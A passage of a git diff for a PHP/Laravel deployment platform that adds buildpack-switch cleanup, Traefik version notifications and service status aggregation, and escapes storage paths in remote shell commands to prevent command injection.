+ 'last_restart_at' => 'datetime', ]; protected static function booted() @@ -174,6 +176,39 @@ protected static function booted() if (count($payload) > 0) { $application->forceFill($payload); } + + // Buildpack switching cleanup logic + if ($application->isDirty('build_pack')) { + $originalBuildPack = $application->getOriginal('build_pack'); + + // Clear Docker Compose specific data when switching away from dockercompose + if ($originalBuildPack === 'dockercompose') { + $application->docker_compose_domains = null; + $application->docker_compose_raw = null; + + // Remove SERVICE_FQDN_* and SERVICE_URL_* environment variables + $application->environment_variables() + ->where(function ($q) { + $q->where('key', 'LIKE', 'SERVICE_FQDN_%') + ->orWhere('key', 'LIKE', 'SERVICE_URL_%'); + }) + ->delete(); + $application->environment_variables_preview() + ->where(function ($q) { + $q->where('key', 'LIKE', 'SERVICE_FQDN_%') + ->orWhere('key', 'LIKE', 'SERVICE_URL_%'); + }) + ->delete(); + } + + // Clear Dockerfile specific data when switching away from dockerfile + if ($originalBuildPack === 'dockerfile') { + $application->dockerfile = null; + $application->dockerfile_location = null; + $application->dockerfile_target_build = null; + $application->custom_healthcheck_found = false; + } + } }); static::created(function ($application) { ApplicationSetting::create([ @@ -634,21 +669,23 @@ protected function serverStatus(): Attribute { return Attribute::make( get: function () { - if (! $this->relationLoaded('additional_servers') || $this->additional_servers->count() === 0) { - return $this->destination?->server?->isFunctional() ?? false; + // Check main server infrastructure health + $main_server_functional = $this->destination?->server?->isFunctional() ?? false; + + if (! $main_server_functional) { + return false; } - $additional_servers_status = $this->additional_servers->pluck('pivot.status'); - $main_server_status = $this->destination?->server?->isFunctional() ?? false; - - foreach ($additional_servers_status as $status) { - $server_status = str($status)->before(':')->value(); - if ($server_status !== 'running') { - return false; + // Check additional servers infrastructure health (not container status!) + if ($this->relationLoaded('additional_servers') && $this->additional_servers->count() > 0) { + foreach ($this->additional_servers as $server) { + if (! $server->isFunctional()) { + return false; // Real server infrastructure problem + } } } - return $main_server_status; + return true; } ); } @@ -772,6 +809,24 @@ public function main_port() return $this->settings->is_static ? [80] : $this->ports_exposes_array; } + public function detectPortFromEnvironment(?bool $isPreview = false): ?int + { + $envVars = $isPreview + ? $this->environment_variables_preview + : $this->environment_variables; + + $portVar = $envVars->firstWhere('key', 'PORT'); + + if ($portVar && $portVar->real_value) { + $portValue = trim($portVar->real_value); + if (is_numeric($portValue)) { + return (int) $portValue; + } + } + + return null; + } + public function environment_variables() { return $this->morphMany(EnvironmentVariable::class, 'resourceable') @@ -980,7 +1035,7 @@ public function isLogDrainEnabled() public function isConfigurationChanged(bool $save = false) { - $newConfigHash = base64_encode($this->fqdn.$this->git_repository.$this->git_branch.$this->git_commit_sha.$this->build_pack.$this->static_image.$this->install_command.$this->build_command.$this->start_command.$this->ports_exposes.$this->ports_mappings.$this->custom_network_aliases.$this->base_directory.$this->publish_directory.$this->dockerfile.$this->dockerfile_location.$this->custom_labels.$this->custom_docker_run_options.$this->dockerfile_target_build.$this->redirect.$this->custom_nginx_configuration.$this->settings->use_build_secrets); + $newConfigHash = base64_encode($this->fqdn.$this->git_repository.$this->git_branch.$this->git_commit_sha.$this->build_pack.$this->static_image.$this->install_command.$this->build_command.$this->start_command.$this->ports_exposes.$this->ports_mappings.$this->custom_network_aliases.$this->base_directory.$this->publish_directory.$this->dockerfile.$this->dockerfile_location.$this->custom_labels.$this->custom_docker_run_options.$this->dockerfile_target_build.$this->redirect.$this->custom_nginx_configuration.$this->settings->use_build_secrets.$this->settings->inject_build_args_to_dockerfile.$this->settings->include_source_commit_in_build); if ($this->pull_request_id === 0 || $this->pull_request_id === null) { $newConfigHash .= json_encode($this->environment_variables()->get(['value', 'is_multiline', 'is_literal', 'is_buildtime', 'is_runtime'])->sort()); } else { diff --git a/app/Models/ApplicationSetting.php b/app/Models/ApplicationSetting.php index 26cb937b3..de545e9bb 100644 --- a/app/Models/ApplicationSetting.php +++ b/app/Models/ApplicationSetting.php @@ -15,6 +15,8 @@ class ApplicationSetting extends Model 'is_container_label_escape_enabled' => 'boolean', 'is_container_label_readonly_enabled' => 'boolean', 'use_build_secrets' => 'boolean', + 'inject_build_args_to_dockerfile' => 'boolean', + 'include_source_commit_in_build' => 'boolean', 'is_auto_deploy_enabled' => 'boolean', 'is_force_https_enabled' => 'boolean', 'is_debug_enabled' => 'boolean', diff --git a/app/Models/DiscordNotificationSettings.php b/app/Models/DiscordNotificationSettings.php index 34adfc997..23e1f0f12 100644 --- a/app/Models/DiscordNotificationSettings.php +++ b/app/Models/DiscordNotificationSettings.php @@ -29,6 +29,7 @@ class DiscordNotificationSettings extends Model 'server_reachable_discord_notifications', 'server_unreachable_discord_notifications', 'server_patch_discord_notifications', + 'traefik_outdated_discord_notifications', 'discord_ping_enabled', ]; @@ -48,6 +49,7 @@ class DiscordNotificationSettings extends Model 'server_reachable_discord_notifications' => 'boolean', 'server_unreachable_discord_notifications' => 'boolean', 'server_patch_discord_notifications' => 'boolean', + 'traefik_outdated_discord_notifications' => 'boolean', 'discord_ping_enabled' => 'boolean', ]; diff --git a/app/Models/EmailNotificationSettings.php b/app/Models/EmailNotificationSettings.php index 39617b4cf..ee31a49b6 100644 --- a/app/Models/EmailNotificationSettings.php +++ b/app/Models/EmailNotificationSettings.php @@ -36,6 +36,7 @@ class EmailNotificationSettings extends Model 'scheduled_task_failure_email_notifications', 'server_disk_usage_email_notifications', 'server_patch_email_notifications', + 'traefik_outdated_email_notifications', ]; protected $casts = [ @@ -63,6 +64,7 @@ class EmailNotificationSettings extends Model 'scheduled_task_failure_email_notifications' => 'boolean', 'server_disk_usage_email_notifications' => 'boolean', 'server_patch_email_notifications' => 'boolean', + 'traefik_outdated_email_notifications' => 'boolean', ]; public function team() diff --git a/app/Models/EnvironmentVariable.php b/app/Models/EnvironmentVariable.php index 80399a16b..843f01e59 100644 --- a/app/Models/EnvironmentVariable.php +++ b/app/Models/EnvironmentVariable.php @@ -190,11 +190,11 @@ private function get_real_environment_variables(?string $environment_variable = return $environment_variable; } foreach ($sharedEnvsFound as $sharedEnv) { - $type = str($sharedEnv)->match('/(.*?)\./'); + $type = str($sharedEnv)->trim()->match('/(.*?)\./'); if (! collect(SHARED_VARIABLE_TYPES)->contains($type)) { continue; } - $variable = str($sharedEnv)->match('/\.(.*)/'); + $variable = str($sharedEnv)->trim()->match('/\.(.*)/'); if ($type->value() === 'environment') { $id = $resource->environment->id; } elseif ($type->value() === 'project') { @@ -231,7 +231,7 @@ private function set_environment_variables(?string $environment_variable = null) $environment_variable = trim($environment_variable); $type = str($environment_variable)->after('{{')->before('.')->value; if (str($environment_variable)->startsWith('{{'.$type) && str($environment_variable)->endsWith('}}')) { - return encrypt((string) str($environment_variable)->replace(' ', '')); + return encrypt($environment_variable); } return encrypt($environment_variable); diff --git a/app/Models/InstanceSettings.php b/app/Models/InstanceSettings.php index cd1c05de4..62b576012 100644 --- a/app/Models/InstanceSettings.php +++ b/app/Models/InstanceSettings.php @@ -2,7 +2,6 @@ namespace App\Models; -use App\Jobs\PullHelperImageJob; use Illuminate\Database\Eloquent\Casts\Attribute; use Illuminate\Database\Eloquent\Model; use Spatie\Url\Url; @@ -35,14 +34,6 @@ class InstanceSettings extends Model protected static function booted(): void { static::updated(function ($settings) { - if ($settings->wasChanged('helper_version')) { - Server::chunkById(100, function ($servers) { - foreach ($servers as $server) { - PullHelperImageJob::dispatch($server); - } - }); - } - // Clear trusted hosts cache when FQDN changes if ($settings->wasChanged('fqdn')) { \Cache::forget('instance_settings_fqdn_host'); diff --git a/app/Models/LocalFileVolume.php b/app/Models/LocalFileVolume.php index 376ea9c5e..96170dbd6 100644 --- a/app/Models/LocalFileVolume.php +++ b/app/Models/LocalFileVolume.php @@ -61,9 +61,14 @@ public function loadStorageOnServer() $path = $path->after('.'); $path = $workdir.$path; } - $isFile = instant_remote_process(["test -f $path && echo OK || echo NOK"], $server); + + // Validate and escape path to prevent command injection + validateShellSafePath($path, 'storage path'); + $escapedPath = escapeshellarg($path); + + $isFile = instant_remote_process(["test -f {$escapedPath} && echo OK || echo NOK"], $server); if ($isFile === 'OK') { - $content = instant_remote_process(["cat $path"], $server, false); + $content = instant_remote_process(["cat {$escapedPath}"], $server, false); // Check if content contains binary data by looking for null bytes or non-printable characters if (str_contains($content, "\0") || preg_match('/[\x00-\x08\x0B\x0C\x0E-\x1F]/', $content)) { $content = '[binary file]'; @@ -91,14 +96,19 @@ public function deleteStorageOnServer() $path = $path->after('.'); $path = $workdir.$path; } - $isFile = instant_remote_process(["test -f $path && echo OK || echo NOK"], $server); - $isDir = instant_remote_process(["test -d $path && echo OK || echo NOK"], $server); + + // Validate and escape path to prevent command injection + validateShellSafePath($path, 'storage path'); + $escapedPath = escapeshellarg($path); + + $isFile = instant_remote_process(["test -f {$escapedPath} && echo OK || echo NOK"], $server); + $isDir = instant_remote_process(["test -d {$escapedPath} && echo OK || echo NOK"], $server); if ($path && $path != '/' && $path != '.' && $path != '..') { if ($isFile === 'OK') { - $commands->push("rm -rf $path > /dev/null 2>&1 || true"); + $commands->push("rm -rf {$escapedPath} > /dev/null 2>&1 || true"); } elseif ($isDir === 'OK') { - $commands->push("rm -rf $path > /dev/null 2>&1 || true"); - $commands->push("rmdir $path > /dev/null 2>&1 || true"); + $commands->push("rm -rf {$escapedPath} > /dev/null 2>&1 || true"); + $commands->push("rmdir {$escapedPath} > /dev/null 2>&1 || true"); } } if ($commands->count() > 0) { @@ -135,10 +145,15 @@ public function saveStorageOnServer() $path = $path->after('.'); $path = $workdir.$path; } - $isFile = instant_remote_process(["test -f $path && echo OK || echo NOK"], $server); - $isDir = instant_remote_process(["test -d $path && echo OK || echo NOK"], $server); + + // Validate and escape path to prevent command injection + validateShellSafePath($path, 'storage path'); + $escapedPath = escapeshellarg($path); + + $isFile = instant_remote_process(["test -f {$escapedPath} && echo OK || echo NOK"], $server); + $isDir = instant_remote_process(["test -d {$escapedPath} && echo OK || echo NOK"], $server); if ($isFile === 'OK' && $this->is_directory) { - $content = instant_remote_process(["cat $path"], $server, false); + $content = instant_remote_process(["cat {$escapedPath}"], $server, false); $this->is_directory = false; $this->content = $content; $this->save(); @@ -151,8 +166,8 @@ public function saveStorageOnServer() throw new \Exception('The following file is a directory on the server, but you are trying to mark it as a file.

Please delete the directory on the server or mark it as directory.'); } instant_remote_process([ - "rm -fr $path", - "touch $path", + "rm -fr {$escapedPath}", + "touch {$escapedPath}", ], $server, false); FileStorageChanged::dispatch(data_get($server, 'team_id')); } @@ -161,19 +176,19 @@ public function saveStorageOnServer() $chown = data_get($this, 'chown'); if ($content) { $content = base64_encode($content); - $commands->push("echo '$content' | base64 -d | tee $path > /dev/null"); + $commands->push("echo '$content' | base64 -d | tee {$escapedPath} > /dev/null"); } else { - $commands->push("touch $path"); + $commands->push("touch {$escapedPath}"); } - $commands->push("chmod +x $path"); + $commands->push("chmod +x {$escapedPath}"); if ($chown) { - $commands->push("chown $chown $path"); + $commands->push("chown $chown {$escapedPath}"); } if ($chmod) { - $commands->push("chmod $chmod $path"); + $commands->push("chmod $chmod {$escapedPath}"); } } elseif ($isDir === 'NOK' && $this->is_directory) { - $commands->push("mkdir -p $path > /dev/null 2>&1 || true"); + $commands->push("mkdir -p {$escapedPath} > /dev/null 2>&1 || true"); } return instant_remote_process($commands, $server); diff --git a/app/Models/PushoverNotificationSettings.php b/app/Models/PushoverNotificationSettings.php index a75fd71d7..189d05dd4 100644 --- a/app/Models/PushoverNotificationSettings.php +++ b/app/Models/PushoverNotificationSettings.php @@ -30,6 +30,7 @@ class PushoverNotificationSettings extends Model 'server_reachable_pushover_notifications', 'server_unreachable_pushover_notifications', 'server_patch_pushover_notifications', + 'traefik_outdated_pushover_notifications', ]; protected $casts = [ @@ -49,6 +50,7 @@ class PushoverNotificationSettings extends Model 'server_reachable_pushover_notifications' => 'boolean', 'server_unreachable_pushover_notifications' => 'boolean', 'server_patch_pushover_notifications' => 'boolean', + 'traefik_outdated_pushover_notifications' => 'boolean', ]; public function team() diff --git a/app/Models/S3Storage.php b/app/Models/S3Storage.php index de27bbca6..47652eb35 100644 --- a/app/Models/S3Storage.php +++ b/app/Models/S3Storage.php @@ -3,6 +3,7 @@ namespace App\Models; use App\Traits\HasSafeStringAttribute; +use Illuminate\Database\Eloquent\Casts\Attribute; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Notifications\Messages\MailMessage; use Illuminate\Support\Facades\Storage; @@ -41,6 +42,19 @@ public function awsUrl() return "{$this->endpoint}/{$this->bucket}"; } + protected function path(): Attribute + { + return Attribute::make( + set: function (?string $value) { + if ($value === null || $value === '') { + return null; + } + + return str($value)->trim()->start('/')->value(); + } + ); + } + public function testConnection(bool $shouldSave = false) { try { diff --git a/app/Models/ScheduledTask.php b/app/Models/ScheduledTask.php index 06903ffb6..bada0b7a5 100644 --- a/app/Models/ScheduledTask.php +++ b/app/Models/ScheduledTask.php @@ -12,6 +12,14 @@ class ScheduledTask extends BaseModel protected $guarded = []; + protected function casts(): array + { + return [ + 'enabled' => 'boolean', + 'timeout' => 'integer', + ]; + } + public function service() { return $this->belongsTo(Service::class); diff --git a/app/Models/ScheduledTaskExecution.php b/app/Models/ScheduledTaskExecution.php index de13fefb0..02fd6917a 100644 --- a/app/Models/ScheduledTaskExecution.php +++ b/app/Models/ScheduledTaskExecution.php @@ -8,6 +8,16 @@ class ScheduledTaskExecution extends BaseModel { protected $guarded = []; + protected function casts(): array + { + return [ + 'started_at' => 'datetime', + 'finished_at' => 'datetime', + 'retry_count' => 'integer', + 'duration' => 'decimal:2', + ]; + } + public function scheduledTask(): BelongsTo { return $this->belongsTo(ScheduledTask::class); diff --git a/app/Models/Server.php b/app/Models/Server.php index e39526949..8b153c8ac 100644 --- a/app/Models/Server.php +++ b/app/Models/Server.php @@ -4,7 +4,9 @@ use App\Actions\Proxy\StartProxy; use App\Actions\Server\InstallDocker; +use App\Actions\Server\InstallPrerequisites; use App\Actions\Server\StartSentinel; +use App\Actions\Server\ValidatePrerequisites; use App\Enums\ProxyTypes; use App\Events\ServerReachabilityChanged; use App\Helpers\SslHelper; @@ -31,6 +33,51 @@ use Symfony\Component\Yaml\Yaml; use Visus\Cuid2\Cuid2; +/** + * @property array{ + * current: string, + * latest: string, + * type: 'patch_update'|'minor_upgrade', + * checked_at: string, + * newer_branch_target?: string, + * newer_branch_latest?: string, + * upgrade_target?: string + * }|null $traefik_outdated_info Traefik version tracking information. + * + * This JSON column stores information about outdated Traefik proxy versions on this server. + * The structure varies depending on the type of update available: + * + * **For patch updates** (e.g., 3.5.0 → 3.5.2): + * ```php + * [ + * 'current' => '3.5.0', // Current version (without 'v' prefix) + * 'latest' => '3.5.2', // Latest patch version available + * 'type' => 'patch_update', // Update type identifier + * 'checked_at' => '2025-11-14T10:00:00Z', // ISO8601 timestamp + * 'newer_branch_target' => 'v3.6', // (Optional) Available major/minor version + * 'newer_branch_latest' => '3.6.2' // (Optional) Latest version in that branch + * ] + * ``` + * + * **For minor/major upgrades** (e.g., 3.5.6 → 3.6.2): + * ```php + * [ + * 'current' => '3.5.6', // Current version + * 'latest' => '3.6.2', // Latest version in target branch + * 'type' => 'minor_upgrade', // Update type identifier + * 'upgrade_target' => 'v3.6', // Target branch (with 'v' prefix) + * 'checked_at' => '2025-11-14T10:00:00Z' // ISO8601 timestamp + * ] + * ``` + * + * **Null value**: Set to null when: + * - Server is fully up-to-date with the latest version + * - Traefik image uses the 'latest' tag (no fixed version tracking) + * - No Traefik version detected on the server + * + * @see \App\Jobs\CheckTraefikVersionForServerJob Where this data is populated + * @see \App\Livewire\Server\Proxy Where this data is read and displayed + */ #[OA\Schema( description: 'Server model', type: 'object', @@ -142,6 +189,7 @@ protected static function booted() protected $casts = [ 'proxy' => SchemalessAttributes::class, + 'traefik_outdated_info' => 'array', 'logdrain_axiom_api_key' => 'encrypted', 'logdrain_newrelic_license_key' => 'encrypted', 'delete_unused_volumes' => 'boolean', @@ -167,6 +215,8 @@ protected static function booted() 'hetzner_server_id', 'hetzner_server_status', 'is_validating', + 'detected_traefik_version', + 'traefik_outdated_info', ]; protected $guarded = []; @@ -522,6 +572,11 @@ public function scopeWithProxy(): Builder return $this->proxy->modelScope(); } + public function scopeWhereProxyType(Builder $query, string $proxyType): Builder + { + return $query->where('proxy->type', $proxyType); + } + public function isLocalhost() { return $this->ip === 'host.docker.internal' || $this->id === 0; @@ -1131,6 +1186,21 @@ public function installDocker() return InstallDocker::run($this); } + /** + * Validate that required commands are available on the server. + * + * @return array{success: bool, missing: array, found: array} + */ + public function validatePrerequisites(): array + { + return ValidatePrerequisites::run($this); + } + + public function installPrerequisites() + { + return InstallPrerequisites::run($this); + } + public function validateDockerEngine($throwError = false) { $dockerBinary = instant_remote_process(['command -v docker'], $this, false, no_sudo: true); diff --git a/app/Models/Service.php b/app/Models/Service.php index 12d3d6a11..2f8a64464 100644 --- a/app/Models/Service.php +++ b/app/Models/Service.php @@ -3,6 +3,7 @@ namespace App\Models; use App\Enums\ProcessStatus; +use App\Services\ContainerStatusAggregator; use App\Traits\ClearsGlobalSearchCache; use App\Traits\HasSafeStringAttribute; use Illuminate\Database\Eloquent\Casts\Attribute; @@ -173,6 +174,21 @@ public function deleteConnectedNetworks() instant_remote_process(["docker network rm {$this->uuid}"], $server, false); } + /** + * Calculate the service's aggregate status from its applications and databases. + * + * This method aggregates status from Eloquent model relationships (not Docker containers). + * It differs from the CalculatesExcludedStatus trait which works with Docker container objects + * during container inspection. This accessor runs on-demand for UI display and works with + * already-stored status strings from the database. + * + * Status format: "{status}:{health}" or "{status}:{health}:excluded" + * - Status values: running, exited, degraded, starting, paused, restarting + * - Health values: healthy, unhealthy, unknown + * - :excluded suffix: Indicates all containers are excluded from health monitoring + * + * @return string The aggregate status in format "status:health" or "status:health:excluded" + */ public function getStatusAttribute() { if ($this->isStarting()) { @@ -182,71 +198,102 @@ public function getStatusAttribute() $applications = $this->applications; $databases = $this->databases; - $complexStatus = null; - $complexHealth = null; + [$complexStatus, $complexHealth, $hasNonExcluded] = $this->aggregateResourceStatuses( + $applications, + $databases, + excludedOnly: false + ); - foreach ($applications as $application) { - if ($application->exclude_from_status) { - continue; + // If all services are excluded from status checks, calculate status from excluded containers + // but mark it with :excluded to indicate monitoring is disabled + if (! $hasNonExcluded && ($complexStatus === null && $complexHealth === null)) { + [$excludedStatus, $excludedHealth] = $this->aggregateResourceStatuses( + $applications, + $databases, + excludedOnly: true + ); + + // Return status with :excluded suffix to indicate monitoring is disabled + if ($excludedStatus && $excludedHealth) { + return "{$excludedStatus}:{$excludedHealth}:excluded"; } - $status = str($application->status)->before('(')->trim(); - $health = str($application->status)->between('(', ')')->trim(); - if ($complexStatus === 'degraded') { - continue; - } - if ($status->startsWith('running')) { - if ($complexStatus === 'exited') { - $complexStatus = 'degraded'; - } else { - $complexStatus = 'running'; - } - } elseif ($status->startsWith('restarting')) { - $complexStatus = 'degraded'; - } elseif ($status->startsWith('exited')) { - $complexStatus = 'exited'; - } - if ($health->value() === 'healthy') { - if ($complexHealth === 'unhealthy') { - continue; - } - $complexHealth = 'healthy'; - } else { - $complexHealth = 'unhealthy'; + + // If no status was calculated at all (no containers exist), return unknown + if ($excludedStatus === null && $excludedHealth === null) { + return 'unknown:unknown:excluded'; } + + return 'exited'; } - foreach ($databases as $database) { - if ($database->exclude_from_status) { - continue; - } - $status = str($database->status)->before('(')->trim(); - $health = str($database->status)->between('(', ')')->trim(); - if ($complexStatus === 'degraded') { - continue; - } - if ($status->startsWith('running')) { - if ($complexStatus === 'exited') { - $complexStatus = 'degraded'; - } else { - $complexStatus = 'running'; - } - } elseif ($status->startsWith('restarting')) { - $complexStatus = 'degraded'; - } elseif ($status->startsWith('exited')) { - $complexStatus = 'exited'; - } - if ($health->value() === 'healthy') { - if ($complexHealth === 'unhealthy') { - continue; - } - $complexHealth = 'healthy'; - } else { - $complexHealth = 'unhealthy'; - } + + // If health is null/empty, return just the status without trailing colon + if ($complexHealth === null || $complexHealth === '') { + return $complexStatus; } return "{$complexStatus}:{$complexHealth}"; } + /** + * Aggregate status and health from collections of applications and databases. + * + * This helper method consolidates status aggregation logic using ContainerStatusAggregator. + * It processes container status strings stored in the database (not live Docker data). + * + * @param \Illuminate\Database\Eloquent\Collection $applications Collection of Application models + * @param \Illuminate\Database\Eloquent\Collection $databases Collection of Database models + * @param bool $excludedOnly If true, only process excluded containers; if false, only process non-excluded + * @return array{0: string|null, 1: string|null, 2?: bool} [status, health, hasNonExcluded (only when excludedOnly=false)] + */ + private function aggregateResourceStatuses($applications, $databases, bool $excludedOnly = false): array + { + $hasNonExcluded = false; + $statusStrings = collect(); + + // Process both applications and databases using the same logic + $resources = $applications->concat($databases); + + foreach ($resources as $resource) { + $isExcluded = $resource->exclude_from_status || str($resource->status)->contains(':excluded'); + + // Filter based on excludedOnly flag + if ($excludedOnly && ! $isExcluded) { + continue; + } + if (! $excludedOnly && $isExcluded) { + continue; + } + + if (! $excludedOnly) { + $hasNonExcluded = true; + } + + // Strip :excluded suffix before aggregation (it's in the 3rd part of "status:health:excluded") + $status = str($resource->status)->before(':excluded')->toString(); + $statusStrings->push($status); + } + + // If no status strings collected, return nulls + if ($statusStrings->isEmpty()) { + return $excludedOnly ? [null, null] : [null, null, $hasNonExcluded]; + } + + // Use ContainerStatusAggregator service for state machine logic + $aggregator = new ContainerStatusAggregator; + $aggregatedStatus = $aggregator->aggregateFromStrings($statusStrings); + + // Parse the aggregated "status:health" string + $parts = explode(':', $aggregatedStatus); + $status = $parts[0] ?? null; + $health = $parts[1] ?? null; + + if ($excludedOnly) { + return [$status, $health]; + } + + return [$status, $health, $hasNonExcluded]; + } + public function extraFields() { $fields = collect([]); @@ -1287,6 +1334,11 @@ public function workdir() public function saveComposeConfigs() { + // Guard against null or empty docker_compose + if (! $this->docker_compose) { + return; + } + $workdir = $this->workdir(); instant_remote_process([ diff --git a/app/Models/ServiceApplication.php b/app/Models/ServiceApplication.php index 49bd56206..aef74b402 100644 --- a/app/Models/ServiceApplication.php +++ b/app/Models/ServiceApplication.php @@ -109,6 +109,11 @@ public function fileStorages() return $this->morphMany(LocalFileVolume::class, 'resource'); } + public function environment_variables() + { + return $this->morphMany(EnvironmentVariable::class, 'resourceable'); + } + public function fqdns(): Attribute { return Attribute::make( @@ -174,4 +179,78 @@ public function isBackupSolutionAvailable() { return false; } + + /** + * Get the required port for this service application. + * Extracts port from SERVICE_URL_* or SERVICE_FQDN_* environment variables + * stored at the Service level, filtering by normalized container name. + * Falls back to service-level port if no port-specific variable is found. + */ + public function getRequiredPort(): ?int + { + try { + // Parse the Docker Compose to find SERVICE_URL/SERVICE_FQDN variables DIRECTLY DECLARED + // for this specific service container (not just referenced from other containers) + $dockerComposeRaw = data_get($this->service, 'docker_compose_raw'); + if (! $dockerComposeRaw) { + // Fall back to service-level port if no compose file + return $this->service->getRequiredPort(); + } + + $dockerCompose = \Symfony\Component\Yaml\Yaml::parse($dockerComposeRaw); + $serviceConfig = data_get($dockerCompose, "services.{$this->name}"); + if (! $serviceConfig) { + return $this->service->getRequiredPort(); + } + + $environment = data_get($serviceConfig, 'environment', []); + + // Extract SERVICE_URL and SERVICE_FQDN variables DIRECTLY DECLARED in this service's environment + // (not variables that are merely referenced with ${VAR} syntax) + $portFound = null; + foreach ($environment as $key => $value) { + if (is_int($key) && is_string($value)) { + // List-style: "- SERVICE_URL_APP_3000" or "- SERVICE_URL_APP_3000=value" + // Extract variable name (before '=' if present) + $envVarName = str($value)->before('=')->trim(); + + // Only process direct declarations + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + // Parse to check if it has a port suffix + $parsed = parseServiceEnvironmentVariable($envVarName->value()); + if ($parsed['has_port'] && $parsed['port']) { + // Found a port-specific variable for this service + $portFound = (int) $parsed['port']; + break; + } + } + } elseif (is_string($key)) { + // Map-style: "SERVICE_URL_APP_3000: value" or "SERVICE_FQDN_DB: localhost" + $envVarName = str($key); + + // Only process direct declarations + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + // Parse to check if it has a port suffix + $parsed = parseServiceEnvironmentVariable($envVarName->value()); + if ($parsed['has_port'] && $parsed['port']) { + // Found a port-specific variable for this service + $portFound = (int) $parsed['port']; + break; + } + } + } + } + + // If a port was found in the template, return it + if ($portFound !== null) { + return $portFound; + } + + // No port-specific variables found for this service, return null + // (DO NOT fall back to service-level port, as that applies to all services) + return null; + } catch (\Throwable $e) { + return null; + } + } } diff --git a/app/Models/ServiceDatabase.php b/app/Models/ServiceDatabase.php index d595721d8..3a249059c 100644 --- a/app/Models/ServiceDatabase.php +++ b/app/Models/ServiceDatabase.php @@ -84,6 +84,10 @@ public function databaseType() $image = str($this->image)->before(':'); if ($image->contains('supabase/postgres')) { $finalImage = 'supabase/postgres'; + } elseif ($image->contains('timescale')) { + $finalImage = 'postgresql'; + } elseif ($image->contains('pgvector')) { + $finalImage = 'postgresql'; } elseif ($image->contains('postgres') || $image->contains('postgis')) { $finalImage = 'postgresql'; } else { diff --git a/app/Models/SlackNotificationSettings.php b/app/Models/SlackNotificationSettings.php index 2b52bfd5b..128b25221 100644 --- a/app/Models/SlackNotificationSettings.php +++ b/app/Models/SlackNotificationSettings.php @@ -29,6 +29,7 @@ class SlackNotificationSettings extends Model 'server_reachable_slack_notifications', 'server_unreachable_slack_notifications', 'server_patch_slack_notifications', + 'traefik_outdated_slack_notifications', ]; protected $casts = [ @@ -47,6 +48,7 @@ class SlackNotificationSettings extends Model 'server_reachable_slack_notifications' => 'boolean', 'server_unreachable_slack_notifications' => 'boolean', 'server_patch_slack_notifications' => 'boolean', + 'traefik_outdated_slack_notifications' => 'boolean', ]; public function team() diff --git a/app/Models/Team.php b/app/Models/Team.php index 6c30389ee..5cb186942 100644 --- a/app/Models/Team.php +++ b/app/Models/Team.php @@ -49,7 +49,9 @@ class Team extends Model implements SendsDiscord, SendsEmail, SendsPushover, Sen protected static function booted() { static::created(function ($team) { - $team->emailNotificationSettings()->create(); + $team->emailNotificationSettings()->create([ + 'use_instance_email_settings' => isDev(), + ]); $team->discordNotificationSettings()->create(); $team->slackNotificationSettings()->create(); $team->telegramNotificationSettings()->create(); diff --git a/app/Models/TelegramNotificationSettings.php b/app/Models/TelegramNotificationSettings.php index 94315ee30..73889910e 100644 --- a/app/Models/TelegramNotificationSettings.php +++ b/app/Models/TelegramNotificationSettings.php @@ -30,6 +30,7 @@ class TelegramNotificationSettings extends Model 'server_reachable_telegram_notifications', 'server_unreachable_telegram_notifications', 'server_patch_telegram_notifications', + 'traefik_outdated_telegram_notifications', 'telegram_notifications_deployment_success_thread_id', 'telegram_notifications_deployment_failure_thread_id', @@ -43,6 +44,7 @@ class TelegramNotificationSettings extends Model 'telegram_notifications_server_reachable_thread_id', 'telegram_notifications_server_unreachable_thread_id', 'telegram_notifications_server_patch_thread_id', + 'telegram_notifications_traefik_outdated_thread_id', ]; protected $casts = [ @@ -62,6 +64,7 @@ class TelegramNotificationSettings extends Model 'server_reachable_telegram_notifications' => 'boolean', 'server_unreachable_telegram_notifications' => 'boolean', 'server_patch_telegram_notifications' => 'boolean', + 'traefik_outdated_telegram_notifications' => 'boolean', 'telegram_notifications_deployment_success_thread_id' => 'encrypted', 'telegram_notifications_deployment_failure_thread_id' => 'encrypted', @@ -75,6 +78,7 @@ class TelegramNotificationSettings extends Model 'telegram_notifications_server_reachable_thread_id' => 'encrypted', 'telegram_notifications_server_unreachable_thread_id' => 'encrypted', 'telegram_notifications_server_patch_thread_id' => 'encrypted', + 'telegram_notifications_traefik_outdated_thread_id' => 'encrypted', ]; public function team() diff --git a/app/Models/WebhookNotificationSettings.php b/app/Models/WebhookNotificationSettings.php index 4ca89e0d3..731006181 100644 --- a/app/Models/WebhookNotificationSettings.php +++ b/app/Models/WebhookNotificationSettings.php @@ -24,11 +24,13 @@ class WebhookNotificationSettings extends Model 'backup_failure_webhook_notifications', 'scheduled_task_success_webhook_notifications', 'scheduled_task_failure_webhook_notifications', - 'docker_cleanup_webhook_notifications', + 'docker_cleanup_success_webhook_notifications', + 'docker_cleanup_failure_webhook_notifications', 'server_disk_usage_webhook_notifications', 'server_reachable_webhook_notifications', 'server_unreachable_webhook_notifications', 'server_patch_webhook_notifications', + 'traefik_outdated_webhook_notifications', ]; protected function casts(): array @@ -44,11 +46,13 @@ protected function casts(): array 'backup_failure_webhook_notifications' => 'boolean', 'scheduled_task_success_webhook_notifications' => 'boolean', 'scheduled_task_failure_webhook_notifications' => 'boolean', - 'docker_cleanup_webhook_notifications' => 'boolean', + 'docker_cleanup_success_webhook_notifications' => 'boolean', + 'docker_cleanup_failure_webhook_notifications' => 'boolean', 'server_disk_usage_webhook_notifications' => 'boolean', 'server_reachable_webhook_notifications' => 'boolean', 'server_unreachable_webhook_notifications' => 'boolean', 'server_patch_webhook_notifications' => 'boolean', + 'traefik_outdated_webhook_notifications' => 'boolean', ]; } diff --git a/app/Notifications/Channels/EmailChannel.php b/app/Notifications/Channels/EmailChannel.php index 245bd85f0..234bc37ad 100644 --- a/app/Notifications/Channels/EmailChannel.php +++ b/app/Notifications/Channels/EmailChannel.php @@ -101,6 +101,38 @@ public function send(SendsEmail $notifiable, Notification $notification): void $mailer->send($email); } + } catch (\Resend\Exceptions\ErrorException $e) { + // Map HTTP status codes to user-friendly messages + $userMessage = match ($e->getErrorCode()) { + 403 => 'Invalid Resend API key. Please verify your API key in the Resend dashboard and update it in settings.', + 401 => 'Your Resend API key has restricted permissions. Please use an API key with Full Access permissions.', + 429 => 'Resend rate limit exceeded. Please try again in a few minutes.', + 400 => 'Email validation failed: '.$e->getErrorMessage(), + default => 'Failed to send email via Resend: 